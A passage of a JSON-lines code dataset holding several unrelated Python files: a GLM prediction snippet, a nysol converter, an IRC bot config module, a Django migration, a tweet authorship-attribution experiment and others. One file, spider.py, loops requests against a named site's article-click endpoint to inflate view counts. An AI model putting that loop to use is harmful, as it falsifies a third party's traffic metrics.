Predict\nX_test.const = sm.add_constant(X_test)\ny_pred2 = result2.predict(X_test.const)\ndf_test2 = pd.concat([X_test, y_test.rename(\"ACTUAL\"), y_pred2.rename(\"PREDICT\")], axis=1).reset_index(drop = True)\ndisplay(df_test2.head(10))\n\n# Caluclate Accuracy\ndf_test2[\"AE\"] = np.abs(df_test2[\"ACTUAL\"] - df_test2[\"PREDICT\"])\ndisplay(df_test2[\"AE\"].mean())\n\n\n\n","sub_path":"GLM.py","file_name":"GLM.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"106720409","text":"# -*- coding: utf-8 -*-\nimport nysol._nysolshell_core as n_core\nfrom nysol.mcmd.nysollib.core import NysolMOD_CORE\nfrom nysol.mcmd.nysollib import nysolutil as nutil\n\nclass Nysol_List2Csv(NysolMOD_CORE):\n\n\t_kwd = [[\"i\",\"o\",\"header\"],[]]\n\t_inkwd = [\"i\"] \n\t_outkwd = [\"o\"]\n\n\tdef __init__(self,*args, **kw_args) :\n\n\t\tif len(args) != 1 :\n\t\t\tprint(\"arge only one\")\n\t\t\treturn None\n\n\t\tif isinstance(args[0],list) :\n\t\t\tkw_args[\"i\"] = args[0]\n\t\telse :\n\t\t\tprint(\"unsuport type\")\n\t\t\treturn None\n\t\t\t\n\t\tif not isinstance(kw_args[\"i\"],list) :\n\t\t\tprint(\"unsuport type\")\n\t\t\treturn None\n\n\t\t# headerがあればmcut \t\t\n\t\tif \"header\" in kw_args :\n\n\t\t\tif isinstance(kw_args[\"header\"],list) :\n\t\t\t\tfld =[]\n\t\t\t\tfor i,v in enumerate(kw_args[\"header\"]):\n\t\t\t\t\tfld.append(\"%d:%s\"%(i,v))\n\t\t\t\t\n\t\t\t\tkw_args[\"f\"] = fld\n\t\n\t\t\telif isinstance(kw_args[\"header\"],str) :\n\t\t\t\thd = re.split(r\",\", kw_args[\"header\"])\n\t\t\t\tfor i,v in enumerate(hd):\n\t\t\t\t\tfld.append(\"%d:%s\"%(i,v))\n\t\t\telse :\n\t\t\t\tprint(\"unsuport type\")\n\t\t\t\treturn None\n\n\t\t\tkw_args[\"nfni\"] = True\n\t\t\tdel kw_args[\"header\"]\n\t\t\tsuper(Nysol_List2Csv,self).__init__(\"mcut\",kw_args)\n\n\t\telse:\n\t\t\tkw_args[\"f\"] = 
\"*\"\t\t\n\t\t\tsuper(Nysol_List2Csv,self).__init__(\"mcut\",kw_args)\n\n","sub_path":"nysol/mcmd/submod/list2csv.py","file_name":"list2csv.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"257856063","text":"#encoding:utf-8\nimport requests\nimport time\n\npath = 'http://demo.ltpower.net/web/wgjj-e05dbfcfdd9fadc366275dd7633d426e/tools/submit_ajax.ashx?action=view_article_click&id='\n\ncount = 4299\nfor k in range(1,200):\n while count != 4272:\n res = requests.get(path+str(count))\n print(res.text)\n print('id:%d 访问第:%d'%(count,k));\n time.sleep(2);\n count -= 1\n count = 4299\n\nprint('done');","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"3131265","text":"# Copyright 2012, Sean B. Palmer\n# Code at http://inamidst.com/duxlot/\n# Apache License 2.0\n\nimport json\nimport os\n\n# Save PEP 3122!\nif \".\" in __name__:\n from . import storage\nelse:\n import storage\n\ndef aliases_create():\n import sys\n if not directory.exists():\n directory.create()\n\n aliases.write({})\n\n print(\"Created duxlot configuration aliases file:\", file=sys.stderr)\n print(\"\", file=sys.stderr)\n print(\" \" + aliases.path, file=sys.stderr)\n print(\"\", file=sys.stderr)\n\ndef aliases_exists(alias=None):\n if alias is not None:\n data = aliases.read()\n return alias in data\n\n if os.path.isfile(aliases.path):\n return True\n\n if os.path.exists(aliases.path):\n fail(error.ALIASES_NON_REGULAR)\n\n return False\n\ndef aliases_get(alias):\n data = aliases.read()\n return data.get(alias)\n\ndef aliases_put(alias, value):\n data = aliases.read()\n data[alias] = value\n aliases.write(data)\n return True\n\ndef aliases_read():\n # @@\n try: f = open(aliases.path, encoding=\"utf-8\")\n except (OSError, IOError):\n fail(error.ALIASES_UNREADABLE)\n\n with f:\n try: data = json.load(f)\n except ValueError:\n fail(error.ALIASES_NOT_JSON)\n except UnicodeDecodeError:\n fail(error.ALIASES_NOT_UTF8)\n\n return data\n\ndef aliases_remove(alias):\n data = aliases_read()\n del data[alias]\n aliases_write(data)\n\ndef aliases_write(data):\n # @@\n try: f = open(aliases.path, \"w\", encoding=\"utf-8\")\n except (OSError, IOError):\n fail(error.ALIASES_UNWRITEABLE)\n\n with f:\n try: json.dump(data, f)\n except (OSError, IOError):\n fail(error.ALIASES_UNWRITEABLE)\n\ndef path(name):\n name = os.path.expanduser(name)\n return os.path.abspath(name)\n\naliases = storage.FrozenStorage({\n \"create\": aliases_create,\n \"exists\": aliases_exists,\n \"get\": aliases_get,\n \"path\": path(\"~/.duxlot/aliases.json\"),\n \"put\": aliases_put,\n \"read\": aliases_read,\n \"remove\": aliases_remove,\n \"write\": aliases_write\n})\n\ndef base(path):\n if path.endswith(\".json\"):\n # Remove \".json\" extension\n path = path[:-5]\n\n if not os.path.basename(path):\n fail(error.BASE_UNUSABLE % reduceuser(path))\n\n return path\n\ndef create():\n \"Create a default minimal config\"\n import sys\n if not directory.exists():\n directory.create()\n\n data = minimal()\n write(default, data, pretty=True)\n\n print(\"Created duxlot default configuration file:\", file=sys.stderr)\n print(\"\", file=sys.stderr)\n print(\" \" + default, file=sys.stderr)\n print(\"\", file=sys.stderr)\n\ndef directory_create():\n # if directory.exists():\n # raise Exception(\"Directory already exists\")\n import sys\n\n try: 
os.mkdir(directory.path)\n except (OSError, IOError):\n fail(error.DIRECTORY_UNWRITEABLE)\n\n print(\"Created default duxlot configuration directory:\", file=sys.stderr)\n print(\"\", file=sys.stderr)\n print(\" \" + directory.path, file=sys.stderr)\n print(\"\", file=sys.stderr)\n\n return True\n\ndef directory_exists():\n if os.path.isdir(directory.path):\n return True\n\n if os.path.exists(directory.path):\n fail(error.DIRECTORY_NON_DIRECTORY)\n\n return False\n\ndirectory = storage.FrozenStorage({\n \"create\": directory_create,\n \"exists\": directory_exists,\n \"path\": path(\"~/.duxlot\") # @@ DUXLOT_DIRECTORY\n})\n\ndefault = os.path.join(directory.path, \"duxlot.json\")\n\ndef reduceuser(path):\n home = os.path.expanduser(\"~/\")\n if path.startswith(home):\n path = \"~/\" + path[len(home):]\n return path\n\nerror = storage.FrozenStorage({\n \"ALIASES_NON_REGULAR\": ##########\n\"\"\"\nThe following path exists, but is not a regular file as it ought to be:\n\n %s\n\nThis is a very strange error, so you're on your own debugging this one. Check\nto make sure you didn't accidentally create a directory there. Otherwise,\nplease file a bug.\n\n(Error Name: ALIASES_NON_REGULAR)\n\"\"\" % reduceuser(aliases.path),\n\n \"ALIASES_NOT_CONFIG\": ##########\n\"\"\"\nYou are trying to use your aliases file as a config file. The aliases file for\nduxlot is a JSON file, but it's not where configuration options for a duxlot\ninstance are stored.\n\nThis was most likely caused by a typo or through misunderstanding the duxlot\nscript options. If you require further help, please read the duxlot\ndocumentation in more detail, or contact the maintainer for further information.\n\n(Error Name: ALIASES_NOT_CONFIG)\n\"\"\",\n\n \"ALIASES_NOT_JSON\": ##########\n\"\"\"\nYour aliases file exists but is not valid JSON:\n\n %s\n\nThis is probably caused by one of two reasons:\n\n1. The file has been created as normal by duxlot, but at some point has been\nedited manually and incorrectly. In this case, you may want to use a JSON\nvalidator to see what has gone wrong, or even remove the file if it does not\ncontain valuable aliases and start again. JSON should be fairly easy to repair.\n\n2. A random file has been created there for no apparent reason. This could be\ndue to a script malfunction or something of this nature. Check to see what the\ncontents of the file are, and if the file isn't important, move it to another\nlocation.\n\n(Error Name: ALIASES_NOT_JSON)\n\"\"\" % reduceuser(aliases.path),\n\n \"ALIASES_NOT_UTF8\": ##########\n\"\"\"\nYour aliases.json file is not correctly encoded as utf-8:\n\n %s\n\nThis error may be difficult to fix. It was probably caused by one of the two\nfollowing reasons:\n\n1. You manually edited the file and didn't save it with the correct encoding.\n\n2. A tool at some point, possibly the term you used as an interface to duxlot,\ndidn't send valid utf-8 and for some reason it got through to the aliases.json\nfile.\n\nYou can either try to fix the encoding, which might incur the difficult task of\nsweeping up mojibake, or you might want to take the easy option and just move\nor even delete the file.\n\nLearn more about utf-8 and mojibake here:\n\nhttps://en.wikipedia.org/wiki/UTF-8\nhttps://en.wikipedia.org/wiki/Mojibake\n\n(Error Name: ALIASES_NOT_UTF8)\n\"\"\" % reduceuser(aliases.path),\n\n \"ALIASES_UNREADABLE\": ##########\n\"\"\"\nYour aliases file cannot be read:\n\n %s\n\nThere is a file there, but duxlot is unable to access it. 
There is probably a\npermissions error with either the file itself, or one of its parent\ndirectories. Check to make sure that the user duxlot is running as has access\nto that file.\n\n(Error Name: ALIASES_UNREADABLE)\n\"\"\" % reduceuser(aliases.path),\n\n \"ALIASES_UNWRITEABLE\": ##########\n\"\"\"\nYour aliases file cannot be written to:\n\n %s\n\nThere is a file there, but duxlot is unable to access it. There is probably a\npermissions error with either the file itself, or one of its parent\ndirectories. Check to make sure that the user duxlot is running as has write\naccess to that file.\n\n(Error Name: ALIASES_UNWRITEABLE)\n\"\"\" % reduceuser(aliases.path),\n\n \"BASE_DIRECTORY_UNWRITEABLE\": ##########\n\"\"\"\nThe directory that your duxlot configuration file is in cannot be written to:\n\n %s\n\nThere is a directory there, but duxlot is unable to access it. There is\nprobably a permissions error with either the directory itself, or one of its\nparent directories. Check to make sure that the user duxlot is running as has\nwrite access to that directory.\n\n(Error Name: BASE_DIRECTORY_UNWRITEABLE)\n\"\"\" % reduceuser(directory.path),\n\n \"BASE_UNUSABLE\": ##########\n\"\"\"\nThe following configuration base is not usable:\n\n %s\n\nThis usually happens when your configuration file is called just \".json\"\ninstead of having a name before the extension, such as \"config.json\". Duxlot\nneeds a base to work with for other files. You can easily solve this by\nrenaming your configuration file.\n\n(Error Name: BASE_UNUSABLE)\n\"\"\", # args: 1\n\n \"CONFIG_NON_REGULAR\": ##########\n\"\"\"\nThe following path exists, but is not a regular file as it ought to be:\n\n %s\n\n@@\n\n(Error Name: CONFIG_NON_REGULAR)\n\"\"\", # args: 1\n\n \"CONFIG_NOT_JSON\": ##########\n\"\"\"\nYour duxlot configuration file exists but is not valid JSON:\n\n %s\n\nThe error message that the JSON parser gave is:\n\n %s\n\nWhich may or may not be helpful, since the duxlot maintainer does not have any\ncontrol over the Python JSON implementation. If you need help writing a valid\nJSON file, try reading through the following resources:\n\nhttp://en.wikipedia.org/wiki/JSON\nhttp://guide.couchdb.org/draft/json.html\n\nYou may also ask the duxlot maintainer for help.\n\n(Error Name: CONFIG_NOT_JSON)\n\"\"\", # args: 2\n\n \"CONFIG_UNREADABLE\": ##########\n\"\"\"\nYour duxlot configuration file exists but can't be read:\n\n %s\n\nThere is probably a permissions error with either the file itself, or one of\nits parent directories. Check to make sure that the user duxlot is running as\nhas access to that file.\n\n(Error Name: CONFIG_UNREADABLE)\n\"\"\", # args: 1\n\n \"CONFIG_UNWRITEABLE\": ##########\n\"\"\"\nYour duxlot configuration file exists but can't be written to:\n\n %s\n\nThere is probably a permissions error with either the file itself, or one of\nits parent directories. 
Check to make sure that the user duxlot is running as\nhas write access to that file.\n\n(Error Name: CONFIG_UNWRITEABLE)\n\"\"\", # args: 1\n\n \"DIRECTORY_NON_DIRECTORY\": ##########\n\"\"\"\nYour duxlot configuration directory path exists, but is not a directory:\n\n %s\n\nThis is probably because you have written a regular file called .duxlot in your\nhome directory, whereas duxlot wants that to be a directory, in order to put\nthe default configuration file and aliases file in it.\n\nIf you intended .duxlot to be a JSON configuration file, you can still use it\nas such, but it will be incompatible with using configuration path aliases in\nduxlot.\n\n(Error Name: DIRECTORY_NON_DIRECTORY)\n\"\"\" % reduceuser(directory.path),\n\n \"DIRECTORY_UNWRITEABLE\": ##########\n\"\"\"\nYour duxlot configuration directory path exists, but can't be written to:\n\n %s\n\nThere is a directory there, but duxlot is unable to access it. There is\nprobably a permissions error with either the directory itself, or one of its\nparent directories. Check to make sure that the user duxlot is running as has\nwrite access to that directory.\n\n(Error Name: DIRECTORY_UNWRITEABLE)\n\"\"\" % reduceuser(directory.path),\n\n \"OPTION_DISALLOWED\": ##########\n\"\"\"\nYour configuration file contains a disallowed option:\n\n %s\n\nThese options are reserved by duxlot for internal use. Please remove this\noption from your configuration file, and try again.\n\n(Error Name: OPTION_DISALLOWED)\n\"\"\", # args: 1\n\n \"OPTION_UNKNOWN\": ##########\n\"\"\"\nYour configuration file contains an unknown option:\n\n %s\n\nThis is probably a typo for a known option. You can check the list of available\noptions by running:\n\n duxlot options\n\n(Error Name: OPTION_UNKNOWN)\n\"\"\", # args: 1\n\n \"VALUE_DISALLOWED\": ##########\n\"\"\"\nYour configuration file contains a disallowed value:\n\n %s\n\nThe values for the \"%s\" option must be one of the following types:\n\n %s\n\nFor more information on JSON and types, consult the following guides:\n\nhttp://en.wikipedia.org/wiki/JSON\nhttp://guide.couchdb.org/draft/json.html\n\nYou may also ask the duxlot maintainer for help.\n\n(Error Name: VALUE_DISALLOWED)\n\"\"\" # args: 3\n})\n\ndef exists(path):\n if os.path.isfile(path):\n return True\n\n if os.path.exists(path):\n fail(error.CONFIG_NON_REGULAR % path)\n\n return False\n\ndef fail(explanation):\n import sys\n\n sys.stderr.write(explanation.lstrip())\n sys.exit(1)\n\ndef info(name, validate=True):\n if name is None:\n if not exists(default):\n create()\n name = default\n\n config_base = base(name)\n config_base_directory = os.path.dirname(config_base)\n if not writeable(config_base_directory):\n fail(error.BASE_DIRECTORY_UNWRITEABLE)\n\n config_data = read(name)\n\n if validate is True:\n globals()[\"validate\"](config_data) # @@ ffffffffu-\n\n # @@ Could be a FrozenStorage object\n return name, config_base, config_data\n\ndef random_nick():\n import random\n digits = \"0123456789\"\n return \"duxlot\" + \"\".join(random.choice(digits) for n in range(3))\n\ndef minimal():\n return {\n \"channels\": [\"#duxlot-test\"],\n \"nick\": random_nick(),\n \"port\": 6667,\n \"server\": \"irc.freenode.net\"\n }\n\noptions = {\n # @@ store, make use of, module data? 
(IRC, Core, General)\n # @@ options that control script.py\n \"admins\": (None, {list}, True, # IRC\n \"Nicks of people allowed to use administrative commands\"),\n\n \"adminchans\": ([], {list}, False, # @@\n \"List of channels where administrative commands are allowed\"),\n\n \"channels\": (None, {list}, True, # Core\n \"List of channels to join\"),\n\n \"database\": (\"$(BASE).database\", {str}, False, # IRC\n \"Base to use for database information\"), # @@ PID file?\n\n \"debug\": (False, {bool}, False, # IRC\n \"Whether to catch and display python exceptions in commands\"),\n\n \"flood\": (False, {bool}, False, # IRC\n \"Bypass the built in flood protection\"),\n\n \"nick\": (random_nick(), {str}, True, # IRC, Core, General\n \"Nick for the bot to use for itself\"),\n\n \"nickserv\": (None, {str}, True, # Core\n \"Pass to send to NickServ services bot\"),\n\n \"owner\": (None, {str}, True, # IRC, General\n \"Nick of the owner of the bot, allowed to use owner commands\"),\n\n \"password\": (None, {str}, False, # Core\n \"Password to be sent to the server\"),\n\n \"port\": (6667, {int}, True, # IRC\n \"The port of the server to connect to\"),\n\n \"prefix\": (\".\", {str}, True, # IRC, General\n \"Default prefix used across all channels for commands\"),\n\n \"prefixes\": ({}, {dict}, True, # IRC, General\n \"Mapping of channels to their local command prefix\"),\n\n \"private\": ([], {list}, True, # General\n \"Private channels where seen data should not be recorded\"),\n\n \"server\": (\"irc.freenode.net\", {str}, True, # IRC\n \"The hostname of the server to connect to\"),\n\n \"ssl\": (False, {bool}, False, # IRC\n \"Whether or not to use a *NON-VALIDATED* SSL connection\"),\n\n \"standard\": (\"*\", {list, str}, False, # IRC\n \"Standard modules to import\"),\n\n \"user\": ([], {list}, False, # IRC\n \"Directories of user modules to import\"),\n\n \"zoneinfo\": (\"/usr/share/zoneinfo\", {str}, False, # General\n \"Location of the IETF Zoneinfo database hierarchy\")\n}\n\n# @@ Ugh, these variables leak out of scope\nfor name, (option_default, types, p, documentation) in options.items():\n options[name] = storage.FrozenStorage({\n \"default\": option_default,\n \"types\": types,\n \"public\": p,\n \"documentation\": documentation\n })\n\ndel name\ndel option_default\ndel types\ndel documentation\n\ndef pretty(data):\n return json.dumps(data, sort_keys=True, indent=4)\n\ndef read(path):\n if path.startswith(\"~\") or (not path.startswith(\"/\")):\n raise ValueError(\"Path not canonical: %s\" % path)\n\n if path == aliases.path:\n fail(error.ALIASES_NOT_CONFIG)\n\n try: f = open(path, encoding=\"utf-8\")\n except (OSError, IOError):\n fail(error.CONFIG_UNREADABLE % path)\n\n with f:\n try: data = json.load(f)\n except ValueError as err:\n args = (reduceuser(path), str(err))\n fail(error.CONFIG_NOT_JSON % args)\n except UnicodeDecodeError:\n fail(error.CONFIG_NOT_UTF8)\n\n if \"__options__\" in data:\n fail(error.OPTION_DISALLOWED % \"__options__\")\n\n data[\"__options__\"] = set(data.keys())\n\n for name in options:\n if not (name in data):\n data[name] = options[name].default\n\n return data\n\ndef validate(data):\n for option, value in data.items():\n if not option in data[\"__options__\"]:\n # @@ how might this happen?\n # private options like __options__?\n continue\n\n if option.startswith(\"@\"):\n continue\n\n if not option in options:\n fail(error.OPTION_UNKNOWN % option)\n\n if not type(value) in options[option].types:\n # print(option, value, type(value))\n args = (value, 
option, options[option].types)\n fail(error.VALUE_DISALLOWED % args)\n return True\n\ndef write(path, data, pretty=False):\n if \"__options__\" in data:\n for name in list(data.keys()):\n if name == \"__options__\":\n continue\n\n if name not in data[\"__options__\"]:\n del data[name]\n del data[\"__options__\"]\n\n # @@\n try: f = open(path, \"w\", encoding=\"utf-8\")\n except (OSError, IOError):\n fail(error.CONFIG_UNWRITEABLE % reduceuser(path))\n\n with f:\n if pretty:\n text = globals()[\"pretty\"](data)\n try: f.write(text)\n except (OSError, IOError):\n fail(error.CONFIG_UNWRITEABLE % reduceuser(path))\n else:\n try: json.dump(data, f)\n except (OSError, IOError):\n fail(error.CONFIG_UNWRITEABLE % reduceuser(path))\n\n return True\n\ndef writeable(base):\n # @@ Not a perfect check\n return os.access(base, os.W_OK)\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":17066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"287051111","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('game', '0016_storyquestion_category'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ManipulationCategory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('category', models.CharField(max_length=20)),\n ],\n ),\n migrations.RenameField(\n model_name='storyquestion',\n old_name='category',\n new_name='pointsCategory',\n ),\n migrations.AddField(\n model_name='storyquestion',\n name='manipulationCategory',\n field=models.ForeignKey(default=1, to='game.ManipulationCategory'),\n preserve_default=False,\n ),\n ]\n","sub_path":"game/migrations/0017_auto_20150615_1111.py","file_name":"0017_auto_20150615_1111.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"507823658","text":"\"\"\"\nIssues: \n* rand_users() sampling duplicate users (should be solved)\n* returning users less than 120 tweets (solved)\n* not enough users to make 100 (solved)\n\nTo do:\n* batch reading of json files (done)\n* for users with more than 120 tweets, only consider first 120\n\"\"\"\nimport os\nimport json\nimport numpy as np\nimport random\nimport warnings\nwarnings.filterwarnings('ignore')\nfrom collections import defaultdict\nfrom collections import OrderedDict\nfrom operator import itemgetter\n\ndata_folder = os.path.join(os.path.expanduser(\"~\"), \"Data\", \"research\")\n# results_output_filename = os.path.join(data_folder, \"attribution_results_control_2.json\")\ntweets_folder = os.path.join(data_folder, \"tweets\")\n\nresults_folder = os.path.join(data_folder, \"results\")\n\n\n# [file1, file2, ... 
]\ndef read_files_from_dir(datafolder):\n \"\"\" returns full file paths from tweets data folder \"\"\"\n files_list = [os.path.join(tweets_folder, file) for file in os.listdir(tweets_folder)]\n return files_list\n\n# read all tweet files from a folder\nfiles_list = read_files_from_dir(tweets_folder)\n\n\ndef read_merge_tweets(files):\n \"\"\" Given an array of files, read each file (and concatenate?)\"\"\"\n dicts = []\n for file in files:\n with open(file, 'r') as inf:\n tweets_dict = json.load(inf)\n tweets_processed = remove_low_tweet_authors(tweets_dict)\n # tweets = remove_non_ascii_chars(tweets)\n dicts.append(tweets_processed)\n # merge step\n super_dict = defaultdict(list) # uses set to avoid duplicates\n for d in dicts:\n for k, v in iter(d.items()):\n super_dict[k].extend(v)\n return super_dict\n\n\ndef copy_keys(table1, keys):\n \"\"\" \n table1 -- dict that we copy FROM.\n table2 -- dict that we copy TO.\n \"\"\"\n table2 = {}\n for key in keys:\n if table1[key]:\n table2[key] = table1[key]\n else: \n print(\"key does not exist in table 2\")\n break\n return table2\n\n\ndef rand_users(users, sample_size):\n sampled = random.sample(users, sample_size)\n return sampled\n\n\ndef remove_hashtag(tweet):\n pass\n\n\ndef remove_at_symbol(tweet):\n pass\n\n\ndef remove_low_tweet_authors(tweets):\n new_dict = {}\n \"\"\" 120 is an optimal number of tweets for authorship attribution (Layton)\"\"\"\n for key in tweets:\n if len(tweets[key]) < 120:\n # tweets.pop(key, None)\n continue\n else:\n new_dict[key] = tweets[key]\n return new_dict\n\n# tweets.keys()\n\n\n# In[10]:\n\n# print(tweets_folder)\nfor file in files_list:\n print(file)\ntweets = read_merge_tweets(files_list)\nprint(len(tweets.keys()))\n\n\n# In[11]:\n\n# authors = {} ## not needed for actual data mining\ndef join_documents(tweets):\n \"\"\" In Python 3, iteritems() has been replaced simply with items() \"\"\"\n documents = []\n classes = []\n author_num = 0\n # use sorted() to enforce ordered dict iteration\n for key, value in iter(sorted(tweets.items())):\n # concatenate documents into one giant corpus\n documents.extend(value)\n # assign classes values to each respective authors' tweets\n classes.extend([author_num] * len(value))\n author_num += 1\n # print(\"Author: \" + key + \", tweets: \" + str(len(value)))\n return documents, classes\n\nrestricted_words = ['http', 'rt']\n\n\ndef get_unique_words(document, lower=False):\n words = defaultdict(int)\n tweet_length = []\n for tweet in document:\n line = tweet.split()\n num_words = len(line)\n tweet_length.append(num_words)\n # append any unique words (to whole corpus) found in tweet\n for word in line: # word in tweet will return chars, therefore use line\n if lower is True:\n word = word.lower()\n if word.isalpha():\n if not words[word] and word not in restricted_words:\n words[word] = 1\n elif words[word] >= 1:\n words[word] += 1\n else:\n continue\n average_tweet_length = np.mean(tweet_length)\n return words, average_tweet_length\n\n\ndef get_sorted_dict(data):\n d = OrderedDict(sorted(data.items(), key=itemgetter(1), reverse=True))\n return d\n\n\n# for each key, sum values across both dicts\ndef sum_dicts(first, second):\n \"\"\" Warning: very slow! 
\"\"\"\n from collections import Counter\n first = Counter(first)\n second = Counter(second)\n first_plus_second = first + second\n return dict(first_plus_second)\n\nfrom sklearn.svm import SVC # support vector machines\nfrom sklearn.cross_validation import cross_val_score\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import grid_search\n\n\"\"\" Set up the parameters. 'C' \"refers to how much classifier should aim to predict all training samples correctly\"\nKernel introduces non-linear elements to make them linearly separable(?) \n\"\"\"\nparameters = {'kernel': ('linear', 'rbf'), 'C': [1, 10]}\nsvr = SVC()\ngrid = grid_search.GridSearchCV(svr, parameters)\n\n# extract character ngrams\npipeline = Pipeline([('feature_extraction', \n CountVectorizer(analyzer='char', ngram_range=(3, 3))),\n ('classifier', grid)])\n\nscores = defaultdict(list)\n\niter_sample = [30, 40]\nRUNS = 30\n\nfor sample_size in iter_sample:\n vocab_size = []\n tweet_size = []\n master_word_dict = {}\n master_vocab_dict = {}\n count = 0\n while count < RUNS:\n author_subset = rand_users(tweets.keys(), sample_size)\n tweets_subset = copy_keys(tweets, author_subset)\n documents, classes = join_documents(tweets_subset)\n \"\"\" calculate average tweet lengths and author vocab sizes\n words, avg_tweet_length = get_unique_words(documents, lower=True)\n tweet_size.append(avg_tweet_length)\n vocab_size.append(len(words))\n master_word_dict = sum_dicts(master_word_dict, words)\n \"\"\"\n\n # print(\"Vocab size: \" + str(vocab_size[count]))\n # retrieve features (ngrams)\n # NB: ngrams are not as likely to be useful compared to words\n\n\n print(\"Creating model ...\")\n model = pipeline.fit(documents, classes)\n print(\"Model created\")\n feature_set = model.named_steps['feature_extraction']\n print(\"Features extracted\")\n master_vocab_dict = sum_dicts(master_vocab_dict, feature_set.vocabulary_)\n print(\"Dicts summed\")\n print(\"Pass: \" + str(count))\n\n\n \"\"\" calculate scores via 3-fold (default) cross validation\n score = cross_val_score(pipeline, documents, classes, scoring='f1')\n avg_score = np.mean(score)\n scores[sample_size].append(avg_score)\n print(\"Run: \" + str(count + 1) + \", Samples: \" + str(sample_size) + \", Score: \" + str(avg_score))\n \"\"\"\n count += 1\n # sort master word dict\n # words_sorted = get_sorted_dict(master_word_dict)\n # word_list = list(words_sorted.keys())\n # master_word_dict = get_sorted_dict(master_word_dict)\n master_vocab_dict = get_sorted_dict(master_vocab_dict)\n\n \"\"\" End of run summary \"\"\"\n print(\"Samples: \" + str(sample_size) + \", sruns: \" + str(RUNS))\n print(\"Score: {:.3f}\".format(np.mean(scores[sample_size])))\n print(\"Mean vocab size: \" + str(np.mean(vocab_size)))\n print(\"Average tweet size: \" + str(np.mean(tweet_size)))\n\n file_name = \"python_ngrams_\" + str(sample_size) + \".json\"\n word_list_output_filename = os.path.join(results_folder, file_name)\n # save what we currently have\n\n with open(word_list_output_filename, 'w') as fp:\n vocab_list = [(k, str(v)) for k, v in master_vocab_dict.items()]\n json.dump(vocab_list, fp)\n\n\n# In[13]:\n\n# get_ipython().magic('matplotlib inline')","sub_path":"research_train_test-python.py","file_name":"research_train_test-python.py","file_ext":"py","file_size_in_byte":7763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"647870577","text":"#\r\n# -*- coding: utf-8 
-*-\r\n#\r\n\r\nimport argparse, queue, threading, traceback\r\nfrom libs.config.manager import manager\r\nfrom libs.aix.vmstat import vmstat\r\nfrom libs.aix.shell import shell\r\nfrom libs.logger.logger import logger\r\n\r\nfrom fabric.network import disconnect_all\r\n\r\nparser = argparse.ArgumentParser(prog='WxPerfTestTool.py', add_help=True)\r\nparser.add_argument('--config', type=str, default='./settings.yml', help='設定ファイルパス')\r\nargs = parser.parse_args()\r\n\r\nsets = manager(args.config)\r\nlog = logger(sets.get('logging', 'file')).get()\r\n\r\n# shellスレッド\r\n#\tkey\t:\tキー\r\ndef shell_thread(key):\r\n\tshell(args.config).execute(key)\r\n\treturn\r\n\r\n\r\n# vmstatスレッド\r\n#\tkey\t:\tキー\r\ndef vmstat_thread(key, child_q):\r\n\tvmstat(args.config, child_q).execute(key)\r\n\treturn\r\n\r\n\r\nif __name__ == '__main__':\r\n\ttry:\r\n\t\tth_vmstat = []\r\n\t\tfor key in sets.get('vmstat_idx', 'keys'):\r\n\t\t\tchild_q = queue.PriorityQueue()\r\n\t\t\tth = threading.Thread(target = vmstat_thread, name = 'vmstat', args = ([key, child_q]))\r\n\t\t\tth.start()\r\n\t\t\tth_vmstat.append({'thread': th, 'queue': child_q})\r\n\t\tth_shell = threading.Thread(target = shell_thread, name = 'shell', args = (['shell']))\r\n\t\tth_shell.start()\r\n\t\tth_shell.join(timeout=None)\r\n\t\tfor th in th_vmstat:\r\n\t\t\tth['queue'].put('terminate order')\r\n\t\t\tth['thread'].join(timeout=None)\r\n\t\tth_vmstat = []\r\n\texcept:\r\n\t\tlog.error(traceback.format_exc())\r\n\tfinally:\r\n\t\tdisconnect_all()\r\n","sub_path":"PerfTestTool/src/ClPerfTestTool.py","file_name":"ClPerfTestTool.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"4679463","text":"import numpy as np\nfrom keras.utils import np_utils\nimport re\n\nclass Text:\n def __init__(self,window_size=10,subspace=0,simple = False):\n self.char_to_idx_vec = np.vectorize(self.char_to_idx)\n self.idx_to_char_vec = np.vectorize(self.idx_to_char)\n self.window_size = window_size\n self.subspace = subspace\n self.simple = simple\n\n with open(\"script.txt\",\"r\") as f:\n self.text = f.read()\n\n if simple:\n self.text = self.text.lower()\n\n self.text = self.text.replace(\" \",\"\")\n self.processText()\n\n def processText(self):\n self.chars = np.array(list(self.text))\n if self.subspace < 1 or self.subspace > len(self.chars)-1:\n self.subspace = self.subspace-1\n else:\n self.chars = self.chars[:self.subspace]\n\n self.num_chars = len(self.chars)\n print(\"Text in chars: \"+str(self.num_chars))\n\n self.unique_chars = np.unique(self.chars)\n self.num_unique_chars = len(self.unique_chars)\n print(\"Unique chars: \"+str(self.num_unique_chars))\n\n def idxs_to_chars(self,idxs):\n return np.array(self.idx_to_char_vec(idxs))\n\n def chars_to_idxs(self,chars):\n return np.array(self.char_to_idx_vec(chars))\n\n def idx_to_char(self,idx):\n return self.unique_chars[idx]\n\n def char_to_idx(self,char):\n return np.where(self.unique_chars==char)[0][0]\n\n def pad(self,arr, size):\n if len(arr) < size:\n arr = list(arr)\n while len(arr) < size:\n arr.append(self.char_to_idx(\" \"))\n arr = np.array(arr)\n return arr\n\n def getWindows(self):\n size = self.window_size\n\n x = []\n y = []\n\n for idx, ch in enumerate(self.chars):\n if idx < len(self.chars)-size:\n 